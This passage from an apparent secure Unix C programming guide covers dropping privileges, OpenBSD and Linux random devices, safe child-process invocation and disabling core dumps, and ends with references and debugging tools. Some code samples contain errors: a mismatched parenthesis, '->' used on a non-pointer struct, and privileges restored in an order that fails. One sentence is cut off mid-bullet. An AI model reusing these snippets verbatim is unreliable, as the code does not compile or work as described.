Ensure that the chroot environment is free from any setuid or setgid programs that may
allow an attacker to escalate their privileges if compromised.

52
2.6 Dropping Privileges

Most programs require privilege to obtain access to a system resource that can only be
accessed by the super-user, or other specific accounts. In a network service, this is often
required to allocate a privileged TCP or UDP port, which a normal user cannot bind to. A
good example of this is a program like BIND (Berkeley Internet Name Daemon), which
needs to bind to port 53 to serve domain name queries. In a local privileged program, this
is normally required to access other restricted system resources, such as memory, disk, or
system configuration information.

While this privilege is normally only required upon initialization, there are many very
large programs, consisting of hundreds of thousands of lines of complex source code,
which never drop their privileges (today this usually this occurs more in commercial
programs).

Sometimes a program is given such a privilege without any for-thought. In a number of


past situations this has led to privileged programs containing trivially exploitable
vulnerabilities. When asked about the reasoning behind this, it was found that this was to
overcome some simple file access or system access restrictions, since the developer could
not see any other solution.

It is important that any privileged program be designed to allocate all resources upon
initialization, and then drop these privileges. Many privileged programs in the OpenBSD
operating system were redesigned with this goal in mind.

To drop privileges, the process needs to set it’s effective user ID and group ID’s to those
of the less privileged user. This is accomplished by using the seteuid() and setegid()
system calls to drop them temporarily, and the setuid() and setgid() system calls to drop
them permanently (this is explained in more detail below in the setuid program section).

WARNING: When dropping privileges, ensure that you first change the group ID of the
process (if this is necessary). If you set the user ID first, the program is no longer running
as the super-user, and therefore does not have sufficient privilege to change the group ID!
This will mean that the group ID privilege is not dropped, and anyone exploiting a
vulnerability in the subsequent program will be able to obtain the permissions of the
privileged group ID.

It is important that you check the return values from the setuid and segid calls. When you
are dropping privileges, and these calls fail, the privileges will not be dropped. If the
return value is not checked, and appropriate action taken, the program will continue
operation as the privileged user.

53
2.6.1. In a network service

To drop privileges in a network service, you must choose a user for the program to run as
once those privileges are dropped. In many cases, the “nobody” user is chosen, as this
user has minimal access to the operating system in general.

int drop()
{
struct passwd *pep = getpwnam(“nobody”);

if (!pep)
return –1;

if (setgid(pep->pw_gid) < 0)
return –1;

if (setuid(pep->pw_uid) < 0)
return –1;

return 0;
}

54
2.6.2. In a local setuid program

When a privileged setuid or setgid program is executed, the process’s real user ID (uid)
and real group ID (gid) remain set to the executing user’s uid and gid, however the
effective user ID (euid), effective group ID (egid), saved user ID and saved group ID are
set to that of the files owner and group (the privileged user). You can drop privileges
temporarily or permanently, depending on your goal.

To drop privileges permanently, the program needs to set the euid, egid, saved uid and
saved gid to the real uid and gid. The setuid() and setgid() calls will set both the real,
effective and saved ID’s to the specified value. Since the real uid and gid in a setuid
program are those of the unprivileged user, the following example will set all 3 id’s to the
current real ID’s.

if (setgid(getgid()) < 0)
return –1;

if (setuid(getuid)) < 0)
return –1;

To temporarily drop privileges, with the intention of regaining them in the future, set the
effective ID’s to the desired values. This works since the effective ID’s are used to
perform system call and permission checks. This will ensure that the saved ID’s are
preserved, allowing you to revert back to them in the future. Ensure that you store the
values of the ID’s for future use however (unless you know that it will always be super-
user).

struct passwd *pep = getpwnam(“nobody”);


uid_t saved_uid;
gid_t saved_gid;

if (!pep)
return –1;

saved_uid = geteuid();
saved_gid = getegid();

if (setegid(pep->pw_gid) < 0)
return –1;

if (seteuid(pep->pw_uid) < 0)
return –1;

/* perform desired unprivileged operations then revert back */

if (setegid(saved_gid) < 0)
return –1;

55
if (seteuid(saved_uid) < 0)
return –1;

56
2.7 Generating Random Numbers

Random number generation has been an issue without an easy solution ever since random
numbers were needed. Most operating systems provide a pseudo-random number
generator library call, which is appropriate for some purposes, however remember the
word “pseudo” in the name. Some operating systems offer built-in random number
generators, usually via a device driver that provides random data. This is most often
accomplished via a kernel driver that mixes and hashes various events and variables on
the system. We will cover some well known methods for obtaining random data in
various operating systems.

2.7.1 Linux

Current Linux operating systems provide the /dev/random and /dev/urandom devices.
These devices provide random numbers based on various system states, that are collected
and then hashed to produce a random number.

It is claimed that both /dev/random and /dev/urandom are secure enough to use in
generating cryptographic keys, challenges, and other applications where secure random
numbers are requisite. It should not be possible to predict the next random number from
these sources.

The difference between the two is that /dev/random can run out of random bytes and the
reader must wait for more to become available. This can occur if not enough activity is
present on the system to allow generation of additional random data, and can sometimes
take a long time for new data to become available.

/dev/random is high quality entropy, generated from measuring the inter-interrupt times
etc. It blocks until enough bits of random data are available.

/dev/urandom is similar, but when the store of entropy is running low, it’ll return a
cryptographically strong hash of what there is. This isn’t as secure, but it’s enough for
most applications.

To use these devices, simply open the device name and perform a read call on the device
for the desired number of bytes.

2.7.2 OpenBSD

The OpenBSD kernel uses the mouse interrupt timing, network data interrupt latency,
inter-keypress timing and disk IO information to fill an entropy pool. Random numbers
are available for kernel routines and are exported via devices to userland programs.
OpenBSD exposes the device /dev/random to userland programs requiring random
numbers.

57
The following is taken from the OpenBSD manual page:

The various random devices produce random output data with different random
qualities. Entropy data is collected from system activity (like disk and network device
interrupts and such), and then run through various hash or message digest functions to
generate the output.

/dev/random This device is reserved for future support of hardware random generators.

/dev/srandom Strong random data. This device returns reliable random data. If
sufficient entropy is not currently available (i.e., the entropy pool quality
starts to run low), the driver pauses while more of such data is collected.
The entropy pool data is converted into output data using MD5.

/dev/urandom Same as above, but does not guarantee the data to be strong. The entropy
pool data is converted into output data using MD5. When the entropy
pool quality runs low, the driver will continue to output data.

/dev/prandom Simple pseudo-random generator.

/dev/arandom As required, entropy pool data re-seeds an ARC4 generator, which then
generates high-quality pseudo-random output data. The arc4random(3)
function in userland libraries seeds itself from this device, providing a
second level of ARC4 hashed data.

58
2.8 Invoking Child Processes

It is common for one program to require the execution of another. When this is required
in a privileged program, such as one that is setuid, or in a network service, it is important
to do this very carefully.

• Never use the following library calls from within a privileged program:

system()
popen()

Both of these functions execute the specified program by utilizing the UNIX
system’s shell interpreter, /bin/sh. By using this, a wide range of potential security
problems are unnecessarily introduced. Instead, use the execl or execv system
calls.

• Ensure that all file descriptors are closed, to prevent the child process from
inheriting access to important files.
• Ensure that the full path to the program is specified, to prevent an alternate or
Trojan version of the program from being executed.
• Drop privileges before execution, so that the child process does not inherit the
privileges of the parent.
• Ensure environment variables which are passed onto the child are cleansed. Pass a
minimal environment, only whats needed. Environment variables can be defined
multiple times, having security consequences. Just throw it all out and

59
2.9 Resource Limitations

2.9.1 Core files

Core files are generated by UNIX programs when an exception occurs. These exceptions
normally occur when the program memory or stack is corrupted, or invalid memory or
misaligned structures are accessed. This situation occurs do the program flaws,
introduced by the developer. When the exception occurs, the operating system writes the
memory of the currently executing program to a disk file, usually called ‘core’ or
‘program.core’, where program is the name of the program which was executing. The
normal use of the core is to analyze the state of the program when it crashed, and assist in
determining where the problem occurred. Two security problems arise out of the creation
of this core file.

• Since all memory contents of the program are written to this file, it is possible that
important, or security critical information (passwords) were in the program’s
memory at the time, and were written to this file.
• Some operating systems have, in the past, failed to check for the previous
existence of the core file, which they are about to create. This can lead to an
interesting security problem if an attacker has created a link, pointing it to a
system critical file. Now by executing a setuid/setgid program which has
permission to write to the target file, and causing the program to have an
exception, the attacker can cause the destruction of the target file, effectively
causing a denial of service attack. The operating system will write a core file out,
with the privilege of the running process, and will follow the attackers link to
overwrite a system critical file.

A good example of where the first problem occurred in the past was in the FTP server
which shipped with the Solaris operating system. A flaw existed whereby an attacker
could connect to the FTP server, and issue the PASV command before any other
command, causing the FTP server to crash. Upon crashing, the FTP server would dump
it’s memory contents into a core file, located in the system root directory. By analyzing
this file, a user with local system access could extract password file hashes, which could
then be cracked to obtain usernames and passwords.

If your program will contain security critical information in memory, it is wise to disable
the creation of core files upon an exception. You can use the setrlimit() function call to
accomplish this.

int setrlimit(int resource, const struct rlimit *rlp);

By using this function, with a resource type of RLIMIT_CORE, you can set the size of
the core file that is created (in bytes). If you specify a size of 0, this prevents a core file
from being created.

60
int nocore()
{
struct rlimit rlp;

rlp->rlim_cur = 0;
rlp->rlim_max = 0;

return(setrlimit(RLIMIT_CORE, &rlp));
}

[1] Smashing The Stack For Fun And Profit


http://www.securityfocus.com/data/library/P49-14.txt
[3] Secure Programming v1.00
http://www.securityfocus.com/frames/?content=/forums/secprog/secure-
programming.html
[4] Format String Attacks
By: Tim Newsham Guardent
http://www.guardent.com/docs/FormatString.PDF
[5]w00w00 on Heap Overflows
By: Matt Conover (a.k.a. Shok) & w00w00 Security Team
http://www.w00w00.org/files/articles/heaptut.txt

Tools
Checker is a tool which finds memory errors at runtime. Its primary function is to emit a
warning when the program reads an uninitialized variable or memory area, or when the
program accesses an unallocated memory area.
Homepage: http://www.gnu.org/software/checker/checker.html
The GNU Debugger (GDB) is a source-level debugger for C, C++, Java, Modula-2, and
several other languages. It runs on GNU/Linux, the BSD’s, and almost every major
proprietary OS. GDB can debug programs running on the same machine as itself, or it
can communicate over a network or serial line with a debugging stub on another
machine; thus, it can be used for embedded and kernel debugging.
Homepage: http://sources.redhat.com/gdb/
Electric Fence , malloc() debugger for Linux and Unix. This will stop your program on
the exact instruction that overruns or under-runs a malloc() buffer.
Homepage: http://perens.com/FreeSoftware/
LCLint is a tool for statically checking C programs. With minimal effort, LCLint can be
used as a better lint. If additional effort is invested adding annotations to programs,
LCLint can perform stronger checks than can be done by any standard lint.
Homepage: http://lclint.cs.virginia.edu/
Strace is a system call trace, i.e. a debugging tool which prints out a trace of all the
system calls made by a another process/program. The program to be traced need not be
recompiled for this, so you can use it on binaries for which you don’t have source.

61
Homepage: http://www.wi.leidenuniv.nl/~wichert/strace/

62

You might also like